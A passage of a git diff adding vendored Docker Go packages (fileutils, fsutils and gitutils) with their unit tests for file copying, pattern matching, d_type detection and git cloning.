+// On Solaris these limits are per process and not systemwide
+func GetTotalUsedFds() int {
+	return -1
+}
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go
new file mode 100644
index 0000000000..6df1be89bb
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_test.go
@@ -0,0 +1,585 @@
+package fileutils
+
+import (
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"runtime"
+	"strings"
+	"testing"
+)
+
+// CopyFile with invalid src
+func TestCopyFileWithInvalidSrc(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-fileutils-test")
+	defer os.RemoveAll(tempFolder)
+	if err != nil {
+		t.Fatal(err)
+	}
+	bytes, err := CopyFile("/invalid/file/path", path.Join(tempFolder, "dest"))
+	if err == nil {
+		t.Fatal("Should have fail to copy an invalid src file")
+	}
+	if bytes != 0 {
+		t.Fatal("Should have written 0 bytes")
+	}
+
+}
+
+// CopyFile with invalid dest
+func TestCopyFileWithInvalidDest(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-fileutils-test")
+	defer os.RemoveAll(tempFolder)
+	if err != nil {
+		t.Fatal(err)
+	}
+	src := path.Join(tempFolder, "file")
+	err = ioutil.WriteFile(src, []byte("content"), 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	bytes, err := CopyFile(src, path.Join(tempFolder, "/invalid/dest/path"))
+	if err == nil {
+		t.Fatal("Should have fail to copy an invalid src file")
+	}
+	if bytes != 0 {
+		t.Fatal("Should have written 0 bytes")
+	}
+
+}
+
+// CopyFile with same src and dest
+func TestCopyFileWithSameSrcAndDest(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-fileutils-test")
+	defer os.RemoveAll(tempFolder)
+	if err != nil {
+		t.Fatal(err)
+	}
+	file := path.Join(tempFolder, "file")
+	err = ioutil.WriteFile(file, []byte("content"), 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	bytes, err := CopyFile(file, file)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if bytes != 0 {
+		t.Fatal("Should have written 0 bytes as it is the same file.")
+	}
+}
+
+// CopyFile with same src and dest but path is different and not clean
+func TestCopyFileWithSameSrcAndDestWithPathNameDifferent(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-fileutils-test")
+	defer os.RemoveAll(tempFolder)
+	if err != nil {
+		t.Fatal(err)
+	}
+	testFolder := path.Join(tempFolder, "test")
+	err = os.MkdirAll(testFolder, 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	file := path.Join(testFolder, "file")
+	sameFile := testFolder + "/../test/file"
+	err = ioutil.WriteFile(file, []byte("content"), 0740)
+	if err != nil {
+		t.Fatal(err)
+	}
+	bytes, err := CopyFile(file, sameFile)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if bytes != 0 {
+		t.Fatal("Should have written 0 bytes as it is the same file.")
+	}
+}
+
+func TestCopyFile(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-fileutils-test")
+	defer os.RemoveAll(tempFolder)
+	if err != nil {
+		t.Fatal(err)
+	}
+	src := path.Join(tempFolder, "src")
+	dest := path.Join(tempFolder, "dest")
+	ioutil.WriteFile(src, []byte("content"), 0777)
+	ioutil.WriteFile(dest, []byte("destContent"), 0777)
+	bytes, err := CopyFile(src, dest)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if bytes != 7 {
+		t.Fatalf("Should have written %d bytes but wrote %d", 7, bytes)
+	}
+	actual, err := ioutil.ReadFile(dest)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if string(actual) != "content" {
+		t.Fatalf("Dest content was '%s', expected '%s'", string(actual), "content")
+	}
+}
+
+// Reading a symlink to a directory must return the directory
+func TestReadSymlinkedDirectoryExistingDirectory(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	var err error
+	if err = os.Mkdir("/tmp/testReadSymlinkToExistingDirectory", 0777); err != nil {
+		t.Errorf("failed to create directory: %s", err)
+	}
+
+	if err = os.Symlink("/tmp/testReadSymlinkToExistingDirectory", "/tmp/dirLinkTest"); err != nil {
+		t.Errorf("failed to create symlink: %s", err)
+	}
+
+	var path string
+	if path, err = ReadSymlinkedDirectory("/tmp/dirLinkTest"); err != nil {
+		t.Fatalf("failed to read symlink to directory: %s", err)
+	}
+
+	if path != "/tmp/testReadSymlinkToExistingDirectory" {
+		t.Fatalf("symlink returned unexpected directory: %s", path)
+	}
+
+	if err = os.Remove("/tmp/testReadSymlinkToExistingDirectory"); err != nil {
+		t.Errorf("failed to remove temporary directory: %s", err)
+	}
+
+	if err = os.Remove("/tmp/dirLinkTest"); err != nil {
+		t.Errorf("failed to remove symlink: %s", err)
+	}
+}
+
+// Reading a non-existing symlink must fail
+func TestReadSymlinkedDirectoryNonExistingSymlink(t *testing.T) {
+	var path string
+	var err error
+	if path, err = ReadSymlinkedDirectory("/tmp/test/foo/Non/ExistingPath"); err == nil {
+		t.Fatalf("error expected for non-existing symlink")
+	}
+
+	if path != "" {
+		t.Fatalf("expected empty path, but '%s' was returned", path)
+	}
+}
+
+// Reading a symlink to a file must fail
+func TestReadSymlinkedDirectoryToFile(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	var err error
+	var file *os.File
+
+	if file, err = os.Create("/tmp/testReadSymlinkToFile"); err != nil {
+		t.Fatalf("failed to create file: %s", err)
+	}
+
+	file.Close()
+
+	if err = os.Symlink("/tmp/testReadSymlinkToFile", "/tmp/fileLinkTest"); err != nil {
+		t.Errorf("failed to create symlink: %s", err)
+	}
+
+	var path string
+	if path, err = ReadSymlinkedDirectory("/tmp/fileLinkTest"); err == nil {
+		t.Fatalf("ReadSymlinkedDirectory on a symlink to a file should've failed")
+	}
+
+	if path != "" {
+		t.Fatalf("path should've been empty: %s", path)
+	}
+
+	if err = os.Remove("/tmp/testReadSymlinkToFile"); err != nil {
+		t.Errorf("failed to remove file: %s", err)
+	}
+
+	if err = os.Remove("/tmp/fileLinkTest"); err != nil {
+		t.Errorf("failed to remove symlink: %s", err)
+	}
+}
+
+func TestWildcardMatches(t *testing.T) {
+	match, _ := Matches("fileutils.go", []string{"*"})
+	if match != true {
+		t.Errorf("failed to get a wildcard match, got %v", match)
+	}
+}
+
+// A simple pattern match should return true.
+func TestPatternMatches(t *testing.T) {
+	match, _ := Matches("fileutils.go", []string{"*.go"})
+	if match != true {
+		t.Errorf("failed to get a match, got %v", match)
+	}
+}
+
+// An exclusion followed by an inclusion should return true.
+func TestExclusionPatternMatchesPatternBefore(t *testing.T) {
+	match, _ := Matches("fileutils.go", []string{"!fileutils.go", "*.go"})
+	if match != true {
+		t.Errorf("failed to get true match on exclusion pattern, got %v", match)
+	}
+}
+
+// A folder pattern followed by an exception should return false.
+func TestPatternMatchesFolderExclusions(t *testing.T) {
+	match, _ := Matches("docs/README.md", []string{"docs", "!docs/README.md"})
+	if match != false {
+		t.Errorf("failed to get a false match on exclusion pattern, got %v", match)
+	}
+}
+
+// A folder pattern followed by an exception should return false.
+func TestPatternMatchesFolderWithSlashExclusions(t *testing.T) {
+	match, _ := Matches("docs/README.md", []string{"docs/", "!docs/README.md"})
+	if match != false {
+		t.Errorf("failed to get a false match on exclusion pattern, got %v", match)
+	}
+}
+
+// A folder pattern followed by an exception should return false.
+func TestPatternMatchesFolderWildcardExclusions(t *testing.T) {
+	match, _ := Matches("docs/README.md", []string{"docs/*", "!docs/README.md"})
+	if match != false {
+		t.Errorf("failed to get a false match on exclusion pattern, got %v", match)
+	}
+}
+
+// A pattern followed by an exclusion should return false.
+func TestExclusionPatternMatchesPatternAfter(t *testing.T) {
+	match, _ := Matches("fileutils.go", []string{"*.go", "!fileutils.go"})
+	if match != false {
+		t.Errorf("failed to get false match on exclusion pattern, got %v", match)
+	}
+}
+
+// A filename evaluating to . should return false.
+func TestExclusionPatternMatchesWholeDirectory(t *testing.T) {
+	match, _ := Matches(".", []string{"*.go"})
+	if match != false {
+		t.Errorf("failed to get false match on ., got %v", match)
+	}
+}
+
+// A single ! pattern should return an error.
+func TestSingleExclamationError(t *testing.T) {
+	_, err := Matches("fileutils.go", []string{"!"})
+	if err == nil {
+		t.Errorf("failed to get an error for a single exclamation point, got %v", err)
+	}
+}
+
+// A string preceded with a ! should return true from Exclusion.
+func TestExclusion(t *testing.T) {
+	exclusion := exclusion("!")
+	if !exclusion {
+		t.Errorf("failed to get true for a single !, got %v", exclusion)
+	}
+}
+
+// Matches with no patterns
+func TestMatchesWithNoPatterns(t *testing.T) {
+	matches, err := Matches("/any/path/there", []string{})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if matches {
+		t.Fatalf("Should not have match anything")
+	}
+}
+
+// Matches with malformed patterns
+func TestMatchesWithMalformedPatterns(t *testing.T) {
+	matches, err := Matches("/any/path/there", []string{"["})
+	if err == nil {
+		t.Fatal("Should have failed because of a malformed syntax in the pattern")
+	}
+	if matches {
+		t.Fatalf("Should not have match anything")
+	}
+}
+
+// Test lots of variants of patterns & strings
+func TestMatches(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	tests := []struct {
+		pattern string
+		text    string
+		pass    bool
+	}{
+		{"**", "file", true},
+		{"**", "file/", true},
+		{"**/", "file", true}, // weird one
+		{"**/", "file/", true},
+		{"**", "/", true},
+		{"**/", "/", true},
+		{"**", "dir/file", true},
+		{"**/", "dir/file", false},
+		{"**", "dir/file/", true},
+		{"**/", "dir/file/", true},
+		{"**/**", "dir/file", true},
+		{"**/**", "dir/file/", true},
+		{"dir/**", "dir/file", true},
+		{"dir/**", "dir/file/", true},
+		{"dir/**", "dir/dir2/file", true},
+		{"dir/**", "dir/dir2/file/", true},
+		{"**/dir2/*", "dir/dir2/file", true},
+		{"**/dir2/*", "dir/dir2/file/", false},
+		{"**/dir2/**", "dir/dir2/dir3/file", true},
+		{"**/dir2/**", "dir/dir2/dir3/file/", true},
+		{"**file", "file", true},
+		{"**file", "dir/file", true},
+		{"**/file", "dir/file", true},
+		{"**file", "dir/dir/file", true},
+		{"**/file", "dir/dir/file", true},
+		{"**/file*", "dir/dir/file", true},
+		{"**/file*", "dir/dir/file.txt", true},
+		{"**/file*txt", "dir/dir/file.txt", true},
+		{"**/file*.txt", "dir/dir/file.txt", true},
+		{"**/file*.txt*", "dir/dir/file.txt", true},
+		{"**/**/*.txt", "dir/dir/file.txt", true},
+		{"**/**/*.txt2", "dir/dir/file.txt", false},
+		{"**/*.txt", "file.txt", true},
+		{"**/**/*.txt", "file.txt", true},
+		{"a**/*.txt", "a/file.txt", true},
+		{"a**/*.txt", "a/dir/file.txt", true},
+		{"a**/*.txt", "a/dir/dir/file.txt", true},
+		{"a/*.txt", "a/dir/file.txt", false},
+		{"a/*.txt", "a/file.txt", true},
+		{"a/*.txt**", "a/file.txt", true},
+		{"a[b-d]e", "ae", false},
+		{"a[b-d]e", "ace", true},
+		{"a[b-d]e", "aae", false},
+		{"a[^b-d]e", "aze", true},
+		{".*", ".foo", true},
+		{".*", "foo", false},
+		{"abc.def", "abcdef", false},
+		{"abc.def", "abc.def", true},
+		{"abc.def", "abcZdef", false},
+		{"abc?def", "abcZdef", true},
+		{"abc?def", "abcdef", false},
+		{"a\\*b", "a*b", true},
+		{"a\\", "a", false},
+		{"a\\", "a\\", false},
+		{"a\\\\", "a\\", true},
+		{"**/foo/bar", "foo/bar", true},
+		{"**/foo/bar", "dir/foo/bar", true},
+		{"**/foo/bar", "dir/dir2/foo/bar", true},
+		{"abc/**", "abc", false},
+		{"abc/**", "abc/def", true},
+		{"abc/**", "abc/def/ghi", true},
+	}
+
+	for _, test := range tests {
+		res, _ := regexpMatch(test.pattern, test.text)
+		if res != test.pass {
+			t.Fatalf("Failed: %v - res:%v", test, res)
+		}
+	}
+}
+
+// An empty string should return true from Empty.
+func TestEmpty(t *testing.T) {
+	empty := empty("")
+	if !empty {
+		t.Errorf("failed to get true for an empty string, got %v", empty)
+	}
+}
+
+func TestCleanPatterns(t *testing.T) {
+	cleaned, _, _, _ := CleanPatterns([]string{"docs", "config"})
+	if len(cleaned) != 2 {
+		t.Errorf("expected 2 element slice, got %v", len(cleaned))
+	}
+}
+
+func TestCleanPatternsStripEmptyPatterns(t *testing.T) {
+	cleaned, _, _, _ := CleanPatterns([]string{"docs", "config", ""})
+	if len(cleaned) != 2 {
+		t.Errorf("expected 2 element slice, got %v", len(cleaned))
+	}
+}
+
+func TestCleanPatternsExceptionFlag(t *testing.T) {
+	_, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md"})
+	if !exceptions {
+		t.Errorf("expected exceptions to be true, got %v", exceptions)
+	}
+}
+
+func TestCleanPatternsLeadingSpaceTrimmed(t *testing.T) {
+	_, _, exceptions, _ := CleanPatterns([]string{"docs", "  !docs/README.md"})
+	if !exceptions {
+		t.Errorf("expected exceptions to be true, got %v", exceptions)
+	}
+}
+
+func TestCleanPatternsTrailingSpaceTrimmed(t *testing.T) {
+	_, _, exceptions, _ := CleanPatterns([]string{"docs", "!docs/README.md  "})
+	if !exceptions {
+		t.Errorf("expected exceptions to be true, got %v", exceptions)
+	}
+}
+
+func TestCleanPatternsErrorSingleException(t *testing.T) {
+	_, _, _, err := CleanPatterns([]string{"!"})
+	if err == nil {
+		t.Errorf("expected error on single exclamation point, got %v", err)
+	}
+}
+
+func TestCleanPatternsFolderSplit(t *testing.T) {
+	_, dirs, _, _ := CleanPatterns([]string{"docs/config/CONFIG.md"})
+	if dirs[0][0] != "docs" {
+		t.Errorf("expected first element in dirs slice to be docs, got %v", dirs[0][1])
+	}
+	if dirs[0][1] != "config" {
+		t.Errorf("expected first element in dirs slice to be config, got %v", dirs[0][1])
+	}
+}
+
+func TestCreateIfNotExistsDir(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-fileutils-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tempFolder)
+
+	folderToCreate := filepath.Join(tempFolder, "tocreate")
+
+	if err := CreateIfNotExists(folderToCreate, true); err != nil {
+		t.Fatal(err)
+	}
+	fileinfo, err := os.Stat(folderToCreate)
+	if err != nil {
+		t.Fatalf("Should have create a folder, got %v", err)
+	}
+
+	if !fileinfo.IsDir() {
+		t.Fatalf("Should have been a dir, seems it's not")
+	}
+}
+
+func TestCreateIfNotExistsFile(t *testing.T) {
+	tempFolder, err := ioutil.TempDir("", "docker-fileutils-test")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(tempFolder)
+
+	fileToCreate := filepath.Join(tempFolder, "file/to/create")
+
+	if err := CreateIfNotExists(fileToCreate, false); err != nil {
+		t.Fatal(err)
+	}
+	fileinfo, err := os.Stat(fileToCreate)
+	if err != nil {
+		t.Fatalf("Should have create a file, got %v", err)
+	}
+
+	if fileinfo.IsDir() {
+		t.Fatalf("Should have been a file, seems it's not")
+	}
+}
+
+// These matchTests are stolen from go's filepath Match tests.
+type matchTest struct {
+	pattern, s string
+	match      bool
+	err        error
+}
+
+var matchTests = []matchTest{
+	{"abc", "abc", true, nil},
+	{"*", "abc", true, nil},
+	{"*c", "abc", true, nil},
+	{"a*", "a", true, nil},
+	{"a*", "abc", true, nil},
+	{"a*", "ab/c", false, nil},
+	{"a*/b", "abc/b", true, nil},
+	{"a*/b", "a/c/b", false, nil},
+	{"a*b*c*d*e*/f", "axbxcxdxe/f", true, nil},
+	{"a*b*c*d*e*/f", "axbxcxdxexxx/f", true, nil},
+	{"a*b*c*d*e*/f", "axbxcxdxe/xxx/f", false, nil},
+	{"a*b*c*d*e*/f", "axbxcxdxexxx/fff", false, nil},
+	{"a*b?c*x", "abxbbxdbxebxczzx", true, nil},
+	{"a*b?c*x", "abxbbxdbxebxczzy", false, nil},
+	{"ab[c]", "abc", true, nil},
+	{"ab[b-d]", "abc", true, nil},
+	{"ab[e-g]", "abc", false, nil},
+	{"ab[^c]", "abc", false, nil},
+	{"ab[^b-d]", "abc", false, nil},
+	{"ab[^e-g]", "abc", true, nil},
+	{"a\\*b", "a*b", true, nil},
+	{"a\\*b", "ab", false, nil},
+	{"a?b", "a☺b", true, nil},
+	{"a[^a]b", "a☺b", true, nil},
+	{"a???b", "a☺b", false, nil},
+	{"a[^a][^a][^a]b", "a☺b", false, nil},
+	{"[a-ζ]*", "α", true, nil},
+	{"*[a-ζ]", "A", false, nil},
+	{"a?b", "a/b", false, nil},
+	{"a*b", "a/b", false, nil},
+	{"[\\]a]", "]", true, nil},
+	{"[\\-]", "-", true, nil},
+	{"[x\\-]", "x", true, nil},
+	{"[x\\-]", "-", true, nil},
+	{"[x\\-]", "z", false, nil},
+	{"[\\-x]", "x", true, nil},
+	{"[\\-x]", "-", true, nil},
+	{"[\\-x]", "a", false, nil},
+	{"[]a]", "]", false, filepath.ErrBadPattern},
+	{"[-]", "-", false, filepath.ErrBadPattern},
+	{"[x-]", "x", false, filepath.ErrBadPattern},
+	{"[x-]", "-", false, filepath.ErrBadPattern},
+	{"[x-]", "z", false, filepath.ErrBadPattern},
+	{"[-x]", "x", false, filepath.ErrBadPattern},
+	{"[-x]", "-", false, filepath.ErrBadPattern},
+	{"[-x]", "a", false, filepath.ErrBadPattern},
+	{"\\", "a", false, filepath.ErrBadPattern},
+	{"[a-b-c]", "a", false, filepath.ErrBadPattern},
+	{"[", "a", false, filepath.ErrBadPattern},
+	{"[^", "a", false, filepath.ErrBadPattern},
+	{"[^bc", "a", false, filepath.ErrBadPattern},
+	{"a[", "a", false, filepath.ErrBadPattern}, // was nil but IMO its wrong
+	{"a[", "ab", false, filepath.ErrBadPattern},
+	{"*x", "xxx", true, nil},
+}
+
+func errp(e error) string {
+	if e == nil {
+		return "<nil>"
+	}
+	return e.Error()
+}
+
+// TestMatch test's our version of filepath.Match, called regexpMatch.
+func TestMatch(t *testing.T) {
+	for _, tt := range matchTests {
+		pattern := tt.pattern
+		s := tt.s
+		if runtime.GOOS == "windows" {
+			if strings.Index(pattern, "\\") >= 0 {
+				// no escape allowed on windows.
+				continue
+			}
+			pattern = filepath.Clean(pattern)
+			s = filepath.Clean(s)
+		}
+		ok, err := regexpMatch(pattern, s)
+		if ok != tt.match || err != tt.err {
+			t.Fatalf("Match(%#q, %#q) = %v, %q want %v, %q", pattern, s, ok, errp(err), tt.match, errp(tt.err))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go
new file mode 100644
index 0000000000..d5c3abf568
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_unix.go
@@ -0,0 +1,22 @@
+// +build linux freebsd
+
+package fileutils
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// GetTotalUsedFds Returns the number of used File Descriptors by
+// reading it via /proc filesystem.
+func GetTotalUsedFds() int {
+	if fds, err := ioutil.ReadDir(fmt.Sprintf("/proc/%d/fd", os.Getpid())); err != nil {
+		logrus.Errorf("Error opening /proc/%d/fd: %s", os.Getpid(), err)
+	} else {
+		return len(fds)
+	}
+	return -1
+}
diff --git a/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go
new file mode 100644
index 0000000000..5ec21cace5
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/fileutils/fileutils_windows.go
@@ -0,0 +1,7 @@
+package fileutils
+
+// GetTotalUsedFds Returns the number of used File Descriptors. Not supported
+// on Windows.
+func GetTotalUsedFds() int {
+	return -1
+}
diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go
new file mode 100644
index 0000000000..9fd054e77f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux.go
@@ -0,0 +1,89 @@
+// +build linux
+
+package fsutils
+
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"syscall"
+	"unsafe"
+)
+
+func locateDummyIfEmpty(path string) (string, error) {
+	children, err := ioutil.ReadDir(path)
+	if err != nil {
+		return "", err
+	}
+	if len(children) != 0 {
+		return "", nil
+	}
+	dummyFile, err := ioutil.TempFile(path, "fsutils-dummy")
+	if err != nil {
+		return "", err
+	}
+	name := dummyFile.Name()
+	if err = dummyFile.Close(); err != nil {
+		return name, err
+	}
+	return name, nil
+}
+
+// SupportsDType returns whether the filesystem mounted on path supports d_type
+func SupportsDType(path string) (bool, error) {
+	// locate dummy so that we have at least one dirent
+	dummy, err := locateDummyIfEmpty(path)
+	if err != nil {
+		return false, err
+	}
+	if dummy != "" {
+		defer os.Remove(dummy)
+	}
+
+	visited := 0
+	supportsDType := true
+	fn := func(ent *syscall.Dirent) bool {
+		visited++
+		if ent.Type == syscall.DT_UNKNOWN {
+			supportsDType = false
+			// stop iteration
+			return true
+		}
+		// continue iteration
+		return false
+	}
+	if err = iterateReadDir(path, fn); err != nil {
+		return false, err
+	}
+	if visited == 0 {
+		return false, fmt.Errorf("did not hit any dirent during iteration %s", path)
+	}
+	return supportsDType, nil
+}
+
+func iterateReadDir(path string, fn func(*syscall.Dirent) bool) error {
+	d, err := os.Open(path)
+	if err != nil {
+		return err
+	}
+	defer d.Close()
+	fd := int(d.Fd())
+	buf := make([]byte, 4096)
+	for {
+		nbytes, err := syscall.ReadDirent(fd, buf)
+		if err != nil {
+			return err
+		}
+		if nbytes == 0 {
+			break
+		}
+		for off := 0; off < nbytes; {
+			ent := (*syscall.Dirent)(unsafe.Pointer(&buf[off]))
+			if stop := fn(ent); stop {
+				return nil
+			}
+			off += int(ent.Reclen)
+		}
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go
new file mode 100644
index 0000000000..4a648239c0
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/fsutils/fsutils_linux_test.go
@@ -0,0 +1,91 @@
+// +build linux
+
+package fsutils
+
+import (
+	"io/ioutil"
+	"os"
+	"os/exec"
+	"syscall"
+	"testing"
+)
+
+func testSupportsDType(t *testing.T, expected bool, mkfsCommand string, mkfsArg ...string) {
+	// check whether mkfs is installed
+	if _, err := exec.LookPath(mkfsCommand); err != nil {
+		t.Skipf("%s not installed: %v", mkfsCommand, err)
+	}
+
+	// create a sparse image
+	imageSize := int64(32 * 1024 * 1024)
+	imageFile, err := ioutil.TempFile("", "fsutils-image")
+	if err != nil {
+		t.Fatal(err)
+	}
+	imageFileName := imageFile.Name()
+	defer os.Remove(imageFileName)
+	if _, err = imageFile.Seek(imageSize-1, 0); err != nil {
+		t.Fatal(err)
+	}
+	if _, err = imageFile.Write([]byte{0}); err != nil {
+		t.Fatal(err)
+	}
+	if err = imageFile.Close(); err != nil {
+		t.Fatal(err)
+	}
+
+	// create a mountpoint
+	mountpoint, err := ioutil.TempDir("", "fsutils-mountpoint")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(mountpoint)
+
+	// format the image
+	args := append(mkfsArg, imageFileName)
+	t.Logf("Executing `%s %v`", mkfsCommand, args)
+	out, err := exec.Command(mkfsCommand, args...).CombinedOutput()
+	if len(out) > 0 {
+		t.Log(string(out))
+	}
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	// loopback-mount the image.
+	// for ease of setting up loopback device, we use os/exec rather than syscall.Mount
+	out, err = exec.Command("mount", "-o", "loop", imageFileName, mountpoint).CombinedOutput()
+	if len(out) > 0 {
+		t.Log(string(out))
+	}
+	if err != nil {
+		t.Skip("skipping the test because mount failed")
+	}
+	defer func() {
+		if err := syscall.Unmount(mountpoint, 0); err != nil {
+			t.Fatal(err)
+		}
+	}()
+
+	// check whether it supports d_type
+	result, err := SupportsDType(mountpoint)
+	if err != nil {
+		t.Fatal(err)
+	}
+	t.Logf("Supports d_type: %v", result)
+	if result != expected {
+		t.Fatalf("expected %v, got %v", expected, result)
+	}
+}
+
+func TestSupportsDTypeWithFType0XFS(t *testing.T) {
+	testSupportsDType(t, false, "mkfs.xfs", "-m", "crc=0", "-n", "ftype=0")
+}
+
+func TestSupportsDTypeWithFType1XFS(t *testing.T) {
+	testSupportsDType(t, true, "mkfs.xfs", "-m", "crc=0", "-n", "ftype=1")
+}
+
+func TestSupportsDTypeWithExt4(t *testing.T) {
+	testSupportsDType(t, true, "mkfs.ext4")
+}
diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go
new file mode 100644
index 0000000000..ded091f2a2
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/gitutils/gitutils.go
@@ -0,0 +1,100 @@
+package gitutils
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/url"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+
+	"github.com/docker/docker/pkg/symlink"
+	"github.com/docker/docker/pkg/urlutil"
+)
+
+// Clone clones a repository into a newly created directory which
+// will be under "docker-build-git"
+func Clone(remoteURL string) (string, error) {
+	if !urlutil.IsGitTransport(remoteURL) {
+		remoteURL = "https://" + remoteURL
+	}
+	root, err := ioutil.TempDir("", "docker-build-git")
+	if err != nil {
+		return "", err
+	}
+
+	u, err := url.Parse(remoteURL)
+	if err != nil {
+		return "", err
+	}
+
+	fragment := u.Fragment
+	clone := cloneArgs(u, root)
+
+	if output, err := git(clone...); err != nil {
+		return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output)
+	}
+
+	return checkoutGit(fragment, root)
+}
+
+func cloneArgs(remoteURL *url.URL, root string) []string {
+	args := []string{"clone", "--recursive"}
+	shallow := len(remoteURL.Fragment) == 0
+
+	if shallow && strings.HasPrefix(remoteURL.Scheme, "http") {
+		res, err := http.Head(fmt.Sprintf("%s/info/refs?service=git-upload-pack", remoteURL))
+		if err != nil || res.Header.Get("Content-Type") != "application/x-git-upload-pack-advertisement" {
+			shallow = false
+		}
+	}
+
+	if shallow {
+		args = append(args, "--depth", "1")
+	}
+
+	if remoteURL.Fragment != "" {
+		remoteURL.Fragment = ""
+	}
+
+	return append(args, remoteURL.String(), root)
+}
+
+func checkoutGit(fragment, root string) (string, error) {
+	refAndDir := strings.SplitN(fragment, ":", 2)
+
+	if len(refAndDir[0]) != 0 {
+		if output, err := gitWithinDir(root, "checkout", refAndDir[0]); err != nil {
+			return "", fmt.Errorf("Error trying to use git: %s (%s)", err, output)
+		}
+	}
+
+	if len(refAndDir) > 1 && len(refAndDir[1]) != 0 {
+		newCtx, err := symlink.FollowSymlinkInScope(filepath.Join(root, refAndDir[1]), root)
+		if err != nil {
+			return "", fmt.Errorf("Error setting git context, %q not within git root: %s", refAndDir[1], err)
+		}
+
+		fi, err := os.Stat(newCtx)
+		if err != nil {
+			return "", err
+		}
+		if !fi.IsDir() {
+			return "", fmt.Errorf("Error setting git context, not a directory: %s", newCtx)
+		}
+		root = newCtx
+	}
+
+	return root, nil
+}
+
+func gitWithinDir(dir string, args ...string) ([]byte, error) {
+	a := []string{"--work-tree", dir, "--git-dir", filepath.Join(dir, ".git")}
+	return git(append(a, args...)...)
+}
+
+func git(args ...string) ([]byte, error) {
+	return exec.Command("git", args...).CombinedOutput()
+}
diff --git a/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go
new file mode 100644
index 0000000000..d197058d20
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/gitutils/gitutils_test.go
@@ -0,0 +1,220 @@
+package gitutils
+
+import (
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"os"
+	"path/filepath"
+	"reflect"
+	"runtime"
+	"strings"
+	"testing"
+)
+
+func TestCloneArgsSmartHttp(t *testing.T) {
+	mux := http.NewServeMux()
+	server := httptest.NewServer(mux)
+	serverURL, _ := url.Parse(server.URL)
+
+	serverURL.Path = "/repo.git"
+	gitURL := serverURL.String()
+
+	mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) {
+		q := r.URL.Query().Get("service")
+		w.Header().Set("Content-Type", fmt.Sprintf("application/x-%s-advertisement", q))
+	})
+
+	args := cloneArgs(serverURL, "/tmp")
+	exp := []string{"clone", "--recursive", "--depth", "1", gitURL, "/tmp"}
+	if !reflect.DeepEqual(args, exp) {
+		t.Fatalf("Expected %v, got %v", exp, args)
+	}
+}
+
+func TestCloneArgsDumbHttp(t *testing.T) {
+	mux := http.NewServeMux()
+	server := httptest.NewServer(mux)
+	serverURL, _ := url.Parse(server.URL)
+
+	serverURL.Path = "/repo.git"
+	gitURL := serverURL.String()
+
+	mux.HandleFunc("/repo.git/info/refs", func(w http.ResponseWriter, r *http.Request) {
+		w.Header().Set("Content-Type", "text/plain")
+	})
+
+	args := cloneArgs(serverURL, "/tmp")
+	exp := []string{"clone", "--recursive", gitURL, "/tmp"}
+	if !reflect.DeepEqual(args, exp) {
+		t.Fatalf("Expected %v, got %v", exp, args)
+	}
+}
+
+func TestCloneArgsGit(t *testing.T) {
+	u, _ := url.Parse("git://github.com/docker/docker")
+	args := cloneArgs(u, "/tmp")
+	exp := []string{"clone", "--recursive", "--depth", "1", "git://github.com/docker/docker", "/tmp"}
+	if !reflect.DeepEqual(args, exp) {
+		t.Fatalf("Expected %v, got %v", exp, args)
+	}
+}
